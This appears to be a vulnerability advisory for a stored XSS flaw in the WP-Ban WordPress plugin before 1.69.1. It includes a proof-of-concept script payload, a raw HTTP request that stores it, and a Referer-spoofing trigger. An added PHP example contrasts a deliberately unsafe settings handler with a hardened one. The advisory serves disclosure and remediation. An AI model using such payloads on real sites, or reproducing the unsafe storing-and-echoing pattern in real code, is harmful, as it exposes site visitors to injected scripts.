wpvulndb | iohex | WPVDB-ID: D0CF24BE-DF87-4E1F-AAE7-E9684C88E7DB
History: Dec 06, 2022 - 12:00 a.m.

WP-Ban < 1.69.1 - Admin+ Stored XSS

2022-12-06 00:00:00
iohex
wpscan.com
Tags: wordpress, ban plugin, stored xss, settings, admin, banned referrers, banned message, cross-site scripting, poc, burp suite, interceptor, request interception, vulnerability, security, capability, multisite, user privilege

EPSS: 0.001 (Low) | Percentile: 39.7%

The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).

PoC

1. Go to the plugin settings and set these fields: in "Banned Referrers", add "xss"; in "Banned Message", add "<script>alert(123);</script>".
2. Go to the website's homepage using Burp Suite and its Interceptor.
3. Intercept the request, change the "Referer" header to "xss" and forward the request. The alert triggers successfully.

The request is:

```http
POST /wordpress_582/wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1

_wpnonce=&_wp_http_referer=%2Fwordpress_582%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_option_reverse_proxy=1&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=xss&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&Submit=Save+Changes
```

Video: https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk

=======

You need to trigger a ban rule to display the ban message. For example, I set the ban rule so that the referer is not equal to xss. The request is like this:

```http
POST /wordpress_582/wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
...

_wpnonce=c298ada8b0&_wp_http_referer=%2Fwordpress_582%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_option_reverse_proxy=1&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=xss&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E&Submit=Save+Changes
```

We set banned_referers=xss, and the payload in the parameter banned_template_message. Then go to the main page, refresh the page, and set the referer as xss; the vulnerability will be triggered.
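As an added example (not WP-Ban's own code, and not the fix shipped in 1.69.1), the following PHP sketches the settings-handling pattern the advisory describes and a hardened counterpart that honours the unfiltered_html capability; option, field and function names are assumptions.

```php
<?php
// Added illustrative example, not WP-Ban's own code: a settings save handler
// for a ban-message option, first in the vulnerable shape the advisory
// describes, then hardened. Option, field and function names are assumed.

// Vulnerable pattern: the POSTed value is stored and later printed verbatim,
// so whoever can reach the settings page can store <script> markup regardless
// of whether they hold the unfiltered_html capability.
function wpban_example_save_unsafe() {
    check_admin_referer( 'wpban_example_save' );
    update_option( 'banned_template_message', wp_unslash( $_POST['banned_template_message'] ) );
    update_option( 'banned_referers', wp_unslash( $_POST['banned_referers'] ) );
}

function wpban_example_render_unsafe() {
    echo get_option( 'banned_template_message' ); // raw HTML straight to the visitor
}

// Hardened pattern: sanitise on save according to the saver's capability and
// escape on output. The ban message is meant to carry HTML, so it goes through
// the wp_kses_post() allowlist rather than esc_html(); the referer list is text.
function wpban_example_save_safe() {
    check_admin_referer( 'wpban_example_save' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    $message = wp_unslash( $_POST['banned_template_message'] ?? '' );
    // Only users holding unfiltered_html may store arbitrary markup; everyone
    // else (e.g. an admin on multisite) gets the allowlist applied.
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        $message = wp_kses_post( $message );
    }
    update_option( 'banned_template_message', $message );
    $referers = sanitize_textarea_field( wp_unslash( $_POST['banned_referers'] ?? '' ) );
    update_option( 'banned_referers', $referers );
}

function wpban_example_render_safe() {
    // Escape at output as well: stored data may predate the fix. Drop this
    // filter only if unfiltered_html holders must be able to render scripts.
    echo wp_kses_post( get_option( 'banned_template_message', '' ) );
}

function wpban_example_referers_field_safe() {
    // Settings-page textarea: escape the stored list so it cannot break out
    // of the element when echoed back to the admin.
    echo '<textarea name="banned_referers">'
        . esc_textarea( get_option( 'banned_referers', '' ) ) . '</textarea>';
}
```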

CPE
Name     Operator  Version
wp-ban   lt        1.69.1

